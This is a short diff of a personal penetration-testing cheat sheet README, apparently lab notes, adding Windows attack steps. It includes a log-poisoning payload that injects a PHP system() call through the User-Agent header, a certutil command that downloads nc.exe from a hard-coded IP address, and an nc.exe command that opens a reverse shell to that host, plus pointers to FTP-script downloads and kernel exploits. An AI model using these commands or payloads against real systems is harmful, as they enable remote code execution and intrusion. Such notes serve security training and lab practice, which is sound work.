F-Masood/MyCheatsheet/README.md

 > 1. The above command will create a ftp.txt file which will have commands to download the file.
 > 1. Finally run: ftp -v -n -s:ftp.txt
 > 1. and file will be downloaded.

+##### RCE via PHP system on Windows server - LFI - Log Poision
+1. Use "seclist ---> LFI ---> Windows file" for fuzzing/testing LFI
+1. To test whether you have you can do RCE, try adding this to UserAgent field--- <?php system('dir');?>
+1. Try loading the log file and you should see files listed.

+##### Shell on Windows via nc.exe
+1. Dowload nc.exe --- certutil.exe -urlcache -split -f http://192.168.49.202:445/nc.exe
+1. Get reverse shell --- nc.exe 192.168.49.202 4443 -e cmd

 #### PrivESC Methodology for Windows
 > 1. Look for exploits on -> https://github.com/SecWiki/windows-kernel-exploits